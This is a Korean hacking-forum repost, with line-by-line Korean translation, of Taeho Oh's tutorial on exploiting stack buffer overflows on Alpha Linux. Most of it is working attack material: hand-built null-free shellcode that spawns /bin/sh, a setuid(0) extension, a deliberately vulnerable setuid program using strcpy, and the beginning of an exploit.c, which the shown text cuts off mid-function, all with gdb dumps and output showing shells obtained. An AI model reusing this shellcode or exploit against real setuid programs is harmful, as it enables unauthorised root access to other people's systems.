1580, 75/79 회원가입  로그인  
   소유
   http://soyu.cafe2.net
   버퍼오버플로우 by 오하라

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=213 [복사]


-오태호님의 허락없이 번역한 글입니다.





-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------







Buffer overflow exploit in the alpha linux





Written by Taeho Oh ( ohhara@postech.edu )

----------------------------------------------------------------------------

Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara

PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus

PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

----------------------------------------------------------------------------





1. Introduction

There are many exploit code of buffer overflow. However, almost all codes

works well only in the intel x86 linux. This paper will attempt to explain

how you exploit same bug in the alpha linux.



-많은 버퍼오버플로우 exploit code 들이 있지만 대부분이 인텔 x86 리눅스에서만

동작합니다. 이 글은 같은 버그를 알파리눅스에서 어떻게 exploit 하는지를 설명

합니다.



2. What do you have to know before reading?

You have to know assembly language, C language, and Linux. Of course, you

have to know what buffer overflow is. You can get the information of the

buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit

by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend

you to read that before reading this one.



-어셈블리, C, 리눅스를 알고있어야합니다. 물론 버퍼오버플로우에대해서도.. 버퍼

오버플로우에 대한 정보는 phrack 49-14 ( Smashing The Stack For Fun And Profit

by Aleph1 ) 에서 얻을 수 있습니다. 상당히 좋은글이며 이 글을 보기전에 읽어보시

기를 권해드립니다.



3. The registers of alpha linux

You have to know how much registers alpha has to make a shellcode. :)

All registers have 64 bits.



-쉘코드를 만들려면 이 많은 알파 레지스터들을 알아야합니다. 모든 레지스터들은

64비트입니다.





Registers of alpha (알파의 레지스터들)

----------------------------------------------------------------------------

$0        v0

$1        t0

$2        t1

$3        t2

$4        t3

$5        t4

$6        t5

$7        t6

$8        t7

$9        s0

$10        s1

$11        s2

$12        s3

$13        s4

$14        s5

$15        fp

$16        a0

$17        a1

$18        a2

$19        a3

$20        a4

$21        a5

$22        t8

$23        t9

$24        t10

$25        t11

$26        ra

$27        t12

$28        at

$29        gp

$30        sp

$31        zero

$32        pc

$33        vfp

----------------------------------------------------------------------------



4. Make a simple shellcode

Now, you will make a simple shellcode. You need not think about '\0'

character now. Because you can modify and remove '\0' character later.



-자 이제 간단한 쉘코드를 만들어볼겁니다. 지금은 '\0'(널문자) 에대해서 신경쓸

필요 없습니다. 나중에 수정 삭제 할 수있으니까요.



shellcodeasm.c

----------------------------------------------------------------------------

#include<stdio.h>

main()

{

        char *name[2];

        name[0]="/bin/sh";

        name[1]=NULL;

        execve(name[0],name,NULL);

}

----------------------------------------------------------------------------



compile and disassemble

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc -o shellcodeasm -static shellcodeasm.c

[ ohhara@ohhara ~ ] {2} $ gdb shellcodeasm

GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "alpha-redhat-linux"...

(gdb) disassemble main

Dump of assembler code for function main:

0x1200001e8 <main>:     ldah    gp,18(t12)

0x1200001ec <main+4>:   lda     gp,30704(gp)

0x1200001f0 <main+8>:   lda     sp,-32(sp)

0x1200001f4 <main+12>:  stq     ra,0(sp)

0x1200001f8 <main+16>:  stq     fp,8(sp)

0x1200001fc <main+20>:  mov     sp,fp

0x120000200 <main+24>:  ldq     t0,-30952(gp)

0x120000204 <main+28>:  stq     t0,16(fp)

0x120000208 <main+32>:  stq     zero,24(fp)

0x12000020c <main+36>:  ldq     a0,16(fp)

0x120000210 <main+40>:  addq    fp,0x10,a1

0x120000214 <main+44>:  clr     a2

0x120000218 <main+48>:  ldq     t12,-32456(gp)

0x12000021c <main+52>:  jsr     ra,(t12),0x120007180 <__execve>

0x120000220 <main+56>:  ldah    gp,18(ra)

0x120000224 <main+60>:  lda     gp,30648(gp)

0x120000228 <main+64>:  mov     fp,sp

0x12000022c <main+68>:  ldq     ra,0(sp)

0x120000230 <main+72>:  ldq     fp,8(sp)

0x120000234 <main+76>:  addq    sp,0x20,sp

0x120000238 <main+80>:  ret     zero,(ra),0x1

End of assembler dump.

(gdb) disassemble execve

Dump of assembler code for function __execve:

0x120007180 <__execve>: lda     v0,59(zero)

0x120007184 <__execve+4>:       callsys

0x120007188 <__execve+8>:       bne     a3,0x120007190 <__execve+16>

0x12000718c <__execve+12>:      ret     zero,(ra),0x1

0x120007190 <__execve+16>:      br      gp,0x120007194 <__execve+20>

0x120007194 <__execve+20>:      ldah    gp,18(gp)

0x120007198 <__execve+24>:      lda     gp,2116(gp)

0x12000719c <__execve+28>:      ldq     t12,-31592(gp)

0x1200071a0 <__execve+32>:

    jmp zero,(t12),0x120007738 <__syscall_error>

End of assembler dump.

(gdb)

----------------------------------------------------------------------------



Now, you can know the condition to execute the "/bin/sh".



이제 "/bin/sh" 를 실행시키기 위한 조건을 알 수 있습니다.



To execute "/bin/sh"

----------------------------------------------------------------------------

a0($16) = The address of "/bin/sh\0"

a1($17) = The address of the address of "/bin/sh\0"

a2($18) = 0

v0($0) = 59

callsys

----------------------------------------------------------------------------



With this information, you can make a shellcode very easily.



-이 정보들로 쉽게 쉘코드를 만들 수 있습니다.



testsc1.c

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */

        "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */

        "\x83\x00\x00\x00";     /* callsys                      */



typedef void (*F)();



main()

{

        F fp;

        fp=(F)(&shellcode);

        fp();

}

----------------------------------------------------------------------------



You may be frightened at the code. Don't worry. There is a line by line

explanation. :)



-이 코드가 여러분을 질리게 만들었을지도 모르겠군요. 걱정마십시오 한줄한줄

설명을 해놨습니다.



testsc1.c shellcode line by line explanation

----------------------------------------------------------------------------

char shellcode[]=



        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        /* $16 = $30 - 200                                      */

        /* $30 is stack pointer. To point "/bin/sh\0",          */

        /* shellcode needs free memory space. $30 - 200 may be  */

        /* free. :) "/bin/sh\0" character string will be stored */

        /* in the $30 - 200 address. To execute "/bin/sh", $16  */

        /* have to point to "/bin/sh\0"                         */

        /* The 'q' of the 'subq' means 64 bit.                  */



/* $16 = $30 - 200

   $30 은 스택포인터입니다. "/bin/sh\0" 를 point 하기위해서,

   쉘코드는 free memory space 가 필요합니다. $30 - 200 이

   아마 free 일겁니다. :) "/bin/sh\0" 문자열은 $30 - 200

   어드레스에 저장될겁니다. "/bin/sh" 를 실행하려면 $16 은

   "/bin/sh\0" 을 point 해야합니다.

   'subq' 의 'q' 는 64비트를 의미합니다.                */



        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        /* $17 = $30 - 192                                      */

        /* To execute "/bin/sh", $17 have to point to the       */

        /* address of "/bin/sh\0". The address of "/bin/sh\0"   */

        /* will be stored in the $30 - 192 address.             */



/* $17 = $30 - 192

   "/bin/sh" 를 실행하기 위해서, $17 은 "/bin/sh\0" 의 어드레스를

   point 해야합니다. "/bin/sh\0" 의 어드레스는 $30 - 192 위치에

   저장될것입니다.                                      */





        "\x12\x04\xff\x47"      /* clr $18                      */

        /* Clear $18 register. To execute "/bin/sh" $18         */

        /* register must be 0.                                  */



/* $18 레지스터를 clear 합니다. "/bin/sh" 를 실행하기위해서

   $18 레지스터는 0 이어야합니다.                       */



        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        /* Store the address of "/bin/sh\0" in the $30 - 192    */

        /* address.                                             */



/* "/bin/sh\0" 의 어드레스를 $30 - 192 위치에

   저장합니다.                                          */



        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        /* Make 0 in the address of $30 - 184.                  */



/* $30 - 184 위치의 값을 0 으로 만듭니다.               */



        "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */

        /* $19 = 0x00680000                                     */

        /* $31 is always 0                                      */



/* $19 = 0x00680000

   $31 는 항상 0 입니다.                                */





        "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */

        /* $19 = 0x0068732f                                     */

        /* $19 = "/sh\0"                                        */

        /* Because alpha is little endian.                      */



/* $19 = 0x0068732f

   $19 = "/sh\0"

   알파는 little endian 이기 때문입니다.                */





        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        /* Store $19 in $30 - 196 address.                      */

        /* $30 - 196 = "/sh\0"                                  */

        /* The 'l' of the 'stl' means 32 bit                    */



/* $19 를 $30 - 196 위치에 저장합니다.

   $30 - 196 = "/sh\0"

   'stl' 의 'l' 은 32비트 라는 뜻입니다.                */



        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        /* $19 = 0x6e690000                                     */



        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        /* $19 = 0x6e69622f                                     */

        /* $19 = "/bin"                                         */



        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        /* Store $19 in $30 - 200 address.                      */

        /* $30 - 200 = "/bin"                                   */



/* $30 - 200 위치에 $19 저장

   $30 - 200 = "/bin"                                   */



        "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */

        /* $0 = 59                                              */

        /* To execute "/bin/sh" $0 must be 59                   */



/* $0 = 59

   "/bin/sh" 를 실행하기 위해서 $0 은 59 이어야합니다.  */



        "\x83\x00\x00\x00";     /* callsys                      */

        /* System call                                          */

        /* Execute "/bin/sh"                                    */



/* System call

   "/bin/sh" 실행                                       */



----------------------------------------------------------------------------



compile and execute testsc1.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc1.c -o testsc1

[ ohhara@ohhara ~ ] {2} $ ./testsc1

bash$

----------------------------------------------------------------------------



Now, you have a shellcode of alpha linux. However, you can't use it to exploit

the vulnerable programs. Because the shellcode has many '\0' characters.

You have to remove all of '\0' character to use buffer overflow exploit.



-이제 여러분은 알파 라눅스의 쉘코드를 얻었습니다. 그렇지만 이것을 exploit 하는

데 사용할 수는 없습니다. 쉘코드에 '\0' 가 포함되있기 때문입니다. 버퍼오버플로우

exploit 을 하기위해서는 '\0' 을 모두 제거해야합니다.



5. Try to remove '\0' character in the shellcode



You can remove '\0' characters by changing the instructions to other

instructions which works same.



-같은 일을하는 다른 instructions(명령)으로 바꿈으로서 '\0' 을 제거할 수 있습니다.



remove '\0' character

----------------------------------------------------------------------------

from



"\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */

"\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */



to



"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

----------------------------------------------------------------------------



One '\0' is removed.



----------------------------------------------------------------------------

from



"\x3b\x00\x1f\x20"      /* lda $0,59($31)               */



to



"\x13\x94\xe7\x43"      /* addq $31,60,$19              */

"\x20\x35\x60\x42"      /* subq $19,1,$0                */

----------------------------------------------------------------------------



Two '\0' are removed.



improved shellcode

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */

        "\x83\x00\x00\x00";     /* callsys                      */

----------------------------------------------------------------------------



compile and execute testsc2.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc2.c -o testsc2

[ ohhara@ohhara ~ ] {2} $ ./testsc2

bash$

----------------------------------------------------------------------------



You have only one instruction to remove, now. But it's difficult to remove.

Because callsys insturction must be used to execute "/bin/sh" and callsys

contains three '\0' characters. You have to insert the code which modifies the

shellcode itself to use callsys instruction.



-이제 하나의 명령만 손보면 됩니다만, 이건 제거하기 좀 어렵습니다. 왜냐면

callsys 명령은 "/bin/sh" 를 실행하는데 사용되어야합니다. callsys 명령에는

'\0' 가 세개 있죠. 여러분은 callsys 명령을 사용하도록 스스로 쉘코드를 수정

하는 코드를 삽입해야 합니다.



6. Try to remove ALL '\0' character in the shellcode



You have to remove '\0' character of callsys instruction.



-callsys 명령의 '\0' 을 제거해야합니다.



final shellcode

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        /* $16 = $30 - 200

        /* $16 must have the shellcode address. However, before */

        /* the bsr instruction, $16 can't have the address.     */

        /* This instruction just store the meaningless address. */

        /* The all instruction before bsr are meaningless.      */



/* $16 은 쉘코드 어드레스를 가지고 있어야합니다. 그러나

   bsr 명령 이전에, $16 이 어드레스를 가질 수 없습니다.

   이 명령은 그저 의미없는 어드레스를 저장합니다.

   bsr 명령 이전의 명령들은 모두 아무 의미 없습니다.    */



        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */

        /* $17 = 0 or 0x83  (논립합 연산)                       */

        /* $17 = 0x83                                           */



        "\x12\x94\x07\x42"      /* addq $16,60,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        /* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4    */

        /* address.                                             */

        /* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" )         */



        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */

        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */

        /* $17 = "\x1f\x04\xff\x47"                             */

        /* "\x1f\x04\xff\x47" is nop instruction.               */



        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */

        /* change "bsr $16,-28" instruction" into nop           */

        /* instruction to pass through the bsr instruction.     */

        /* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" )         */



        "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */

        /* Jump to "bis $31,0x83,$17" and store the current     */

        /* address in the $16.                                  */

        /* After jump, this insturction will be changed into    */

        /* nop instruction.                                     */



/* "bis $31,0x83,$17" 로 점프하고 현재의 어드레스를

   $16 에 저장합니다.

   점프한 후에 이 명령은 nop 명령으로 바뀌어질것입니다. */





        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */



        "\xff\xff\xff\xff";     /* callsys ( disguised )        */

        /* This will be changed to "\x83\x00\x00\x00"           */

----------------------------------------------------------------------------



compile and execute testsc3.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc3.c -o testsc3

[ ohhara@ohhara ~ ] {2} $ ./testsc3

bash$

----------------------------------------------------------------------------



7. Insert setuid(0) code in the shellcode.



You may not get the rootshell with your shellcode by overflowing the

vulnerable setuid root program. You have to insert setuid(0) code into the

shellcode.



-취약한 setuid root 프로그램에서 버퍼오버플로우를 일으켜도, 이 쉘코드로는

루트쉘을 얻지 못할 수도 있습니다. 쉘코드에 setuid(0) 코드를 삽입해야합니다.



setuidasm.c

----------------------------------------------------------------------------

main()

{

        setuid(0);

}

----------------------------------------------------------------------------



compile and disassemble

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c

[ ohhara@ohhara ~ ] {2} $ gdb setuidasm

GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB.  Type "show warranty" for details.

This GDB was configured as "alpha-redhat-linux"...

(gdb) disassemble main

Dump of assembler code for function main:

0x1200001e8 <main>:     ldah    gp,18(t12)

0x1200001ec <main+4>:   lda     gp,30696(gp)

0x1200001f0 <main+8>:   lda     sp,-16(sp)

0x1200001f4 <main+12>:  stq     ra,0(sp)

0x1200001f8 <main+16>:  stq     fp,8(sp)

0x1200001fc <main+20>:  mov     sp,fp

0x120000200 <main+24>:  clr     a0

0x120000204 <main+28>:  ldq     t12,-31056(gp)

0x120000208 <main+32>:  jsr     ra,(t12),0x120007180 <__setuid>

0x12000020c <main+36>:  ldah    gp,18(ra)

0x120000210 <main+40>:  lda     gp,30660(gp)

0x120000214 <main+44>:  mov     fp,sp

0x120000218 <main+48>:  ldq     ra,0(sp)

0x12000021c <main+52>:  ldq     fp,8(sp)

0x120000220 <main+56>:  addq    sp,0x10,sp

0x120000224 <main+60>:  ret     zero,(ra),0x1

End of assembler dump.

(gdb) disassemble setuid

Dump of assembler code for function __setuid:

0x120007180 <__setuid>: lda     v0,23(zero)

0x120007184 <__setuid+4>:       callsys

0x120007188 <__setuid+8>:       bne     a3,0x120007190 <__setuid+16>

0x12000718c <__setuid+12>:      ret     zero,(ra),0x1

0x120007190 <__setuid+16>:      br      gp,0x120007194 <__setuid+20>

0x120007194 <__setuid+20>:      ldah    gp,18(gp)

0x120007198 <__setuid+24>:      lda     gp,2108(gp)

0x12000719c <__setuid+28>:      ldq     t12,-31600(gp)

0x1200071a0 <__setuid+32>:

    jmp zero,(t12),0x120007738 <__syscall_error>

End of assembler dump.

(gdb)

----------------------------------------------------------------------------



Now, you can know the condition to setuid(0).



To setuid(0)

----------------------------------------------------------------------------

a0($16) = 0

v0($0) = 23

callsys

----------------------------------------------------------------------------



This contains callsys instruction. So you have to remove '\0' of the setuid(0)

code, too.



-여기에도 callsys 명령이 있습니다. 그래서 setuid(0) 코드의 '\0' 을 제거해야

합니다.





testsc4.c

----------------------------------------------------------------------------

char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */

        "\x12\x14\x02\x42"      /* addq $16,16,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\x12\x94\x09\x42"      /* addq $16,76,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */

        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */

        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */

        "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */

        "\x10\x04\xff\x47"      /* clr $16                      */

        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */

        "\x20\x35\x20\x42"      /* subq $17,1,$0                */

        "\xff\xff\xff\xff"      /* callsys ( disguised )        */

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */

        "\xff\xff\xff\xff";     /* callsys ( disguised )        */



typedef void (*F)();



main()

{

        F fp;

        fp=(F)(&shellcode);

        fp();

}

----------------------------------------------------------------------------



If you read this paper, you can recognize what testsc4.c do. :)



-이글을 읽고있다면, testsc4.c 가 뭘하는지 알수있겠죠.   :)



compile and execute testsc4.c

----------------------------------------------------------------------------

[ ohhara@ohhara ~ ] {1} $ gcc testsc4.c -o testsc4

[ ohhara@ohhara ~ ] {2} $ ./testsc4

bash$

----------------------------------------------------------------------------



8. Exploit a vulnerable setuid root program



You can exploit a classic vulnernable program in the alpha linux. This

is an example.



-예전의 취약한 프로그램을 알파리눅스에서 exploit 할 수 있습니다. 다음은

예 입니다.



vulnerable.c

----------------------------------------------------------------------------

#include<stdio.h>

#include<string.h>



void vulfunc(char *buf)

{

        char localbuf[1024];

        strcpy(localbuf+1,buf);

}



main(int argc,char **argv)

{

        if(argc>1)

                vulfunc(argv[1]);

}

----------------------------------------------------------------------------



You can't change the return address of the vulfunc function. When you try

to overflow the localbuf of vulfunc, you can change the return address of

the main function. ( It's similar to the stack of the sparc. )

Because the localbuf is stored after the vulfunc return address. The intel

x86 is that localbuf is stored before the vulfunc return address.

Therefore, by overflowing localbuf in the intel x86, localbuf can change

the return address of vulfunc function. However, in the alpha, localbuf can't

change the return address of vulfunc function and can change the return address

of the main function.



-vulfunc 함수의 리턴어드레스를 바꿀수는 없습니다. vulfunc 의 localbuf 를 오버플로

우 일으킬때, main 함수의 리턴 어드레스를 바꿀 수 있습니다. (스팍의 스택과 유사)  

왜냐하면 localbuf 가 vulfunc 리턴어드레스의 뒤에 저장되기때문입니다. Intel x86 에서

는 localbuf 가 vulfunc 리턴어드레스의 앞에 저장됩니다. 그래서 intel x86 에서는

localbuf 를 오버플로우 일으켜서 vulfunc 함수의 리턴어드레스를 바꿀 수있습니다. 그러

나, 알파에서는 localbuf 로 vulfunc 함수의 리턴어드레스를 바꿀 수 없고 main 함수의

리턴어드레스를 바꿀 수 있습니다.



To execute the instruction, the code must be well aligned. For example,

the instruction can be located in 0x120000000 and 0x120000004 and can't be

located in 0x120000001, 0x120000002, and 0x120000003. ( step by 4 )



-Instruction(명령)을 실행시키기 위해서는 코드가 제대로 정렬되어 있어야 합니다.

예를들면, instruction 은 0x120000000, 0x120000004 에 위치할 수는 있지만

0x120000001, 0x120000002, 0x120000003 에 위치할 수 없습니다. ( step by 4 )



The address of alpha is 64 bit. Almost all cases, the address of stack

is looks like 0x000000011fffff24. The address has many '\0' characters.

Therefore, you can't insert many return addresses in the buffer. You must

insert only one. So you must know the location of the return address exactly.

It's not difficult to find that. Because the location of the return address

is decided at the compile time.



-알파의 어드레스는 64비트입니다. 대부분의경우 스택의 어드레스는 0x000000011fffff24 이

런식입니다. 어드레스에 '\0' 이 많이 있죠. 그래서 버퍼에 리턴 어드레스를 많이 삽입할 수

가 없습니다. 꼭 하나만 넣어야합니다. 그러므로 리턴 어드레스 넣을곳을 정확하게 알아

야합니다. 그곳을 찾는일은 그리 어렵지 않습니다. 리턴 어드레스가 있는곳은 컴파일할

때 정해지기 때문입니다.



exploit.c

----------------------------------------------------------------------------

#include<stdio.h>

#include<string.h>



#define OFFSET                            0

#define ALIGN                             3     /* 0, 1, 2, 3           */

#define RET_POSITION                   1028     /* 0, 4, 8, 12, . . .   */

#define NOP              "\x1f\x04\xff\x47"



char shellcode[]=

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */

        "\x12\x14\x02\x42"      /* addq $16,16,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\x12\x94\x09\x42"      /* addq $16,76,$18              */

        "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */

        "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */

        "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */

        "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */

        "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */

        "\x10\x04\xff\x47"      /* clr $16                      */

        "\x11\x14\xe3\x43"      /* addq $31,24,$17              */

        "\x20\x35\x20\x42"      /* subq $17,1,$0                */

        "\xff\xff\xff\xff"      /* callsys ( disguised )        */

        "\x30\x15\xd9\x43"      /* subq $30,200,$16             */

        "\x31\x15\xd8\x43"      /* subq $30,192,$17             */

        "\x12\x04\xff\x47"      /* clr $18                      */

        "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */

        "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */

        "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */

        "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */

        "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */

        "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */

        "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */

        "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */

        "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */

        "\x13\x94\xe7\x43"      /* addq $31,60,$19              */

        "\x20\x35\x60\x42"      /* subq $19,1,$0                */

        "\xff\xff\xff\xff";     /* callsys ( disguised )        */



unsigned long get_sp(void)

{

        __asm__("bis $31,$30,$0");

}



int main(int argc,char **argv)

{

        char buff[RET_POSITION+8+ALIGN+1],*ptr;

        char *nop;


  Hit : 15021     Date : 2004/07/07 05:19



    
ds 이것이 진정한 스크롤의 압박.. 2004/08/06
-0- 동의 2004/08/09
투명해커 자필이신가?끝까지보고도 이해안됨 2005/11/10  
100   허접 팁 Setuid 쉽게 찾기 -_-;[3]     ttongfly
09/10 14655
99   [자작] W's 암호학(Cryptology) - 에니그마[3]     williamlee
08/06 14667
98   리눅스 설치 + Windows설치(생초보에게 좋은 강좌)!![3]     승리의박성환
04/15 14674
97   레이스 컨디션(경쟁 조건)[14]     소유
09/06 14715
96   [링크+자작] 텔넷관련과 텔넷이 안될때의 해결법과 한글깨짐[6]     초콜렛나인
03/02 14726
95   [자작] 웹봇을 만들어 보자.[11]     kjwon15
02/08 14885
94   네트워크 개념 휘어잡기 2[16]     소유
09/11 14887
93   리눅스설치후 윈도우 설치 & grub 복구     exit96m
03/02 14896
92   맥북 프로 한영전환 키보드 레지스트리[6]     푸른하늘
10/21 14946
91   [펌] PC키퍼 깨기[4]     dzhfldk
08/22 14986
  버퍼오버플로우 by 오하라[3]     소유
07/07 15020
89   리눅스 명령어 마스터 5[8]     소유
09/06 15282
88   [자작] 구글 검색법[13]     초콜렛나인
02/08 15316
87   Xp Best Tip 30가지!!(그대는 알고있는가???)[23]     chagang531
09/13 15411
86   Overflow 공격 기법들에 대한 정리 by 버스트     소유
07/07 15418
85   꼭배우실길바람니다[5]     netwow1
12/14 15616
84   VI편집기 명령어 및 사용법 정리[6]     ntmaster99
09/16 15645
83   [특별] find 명령어[7]     소유
09/09 15698
82   [펌] 공유 메모리 멀티 프로세서(Shared Memory Multiprocessor, SMP)     qpt0707
03/05 15740
81   [간단] 모스부호표 입니다.[6]     푸른하늘
05/09 15753
[1]..[71][72][73][74] 75 [76][77][78][79]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com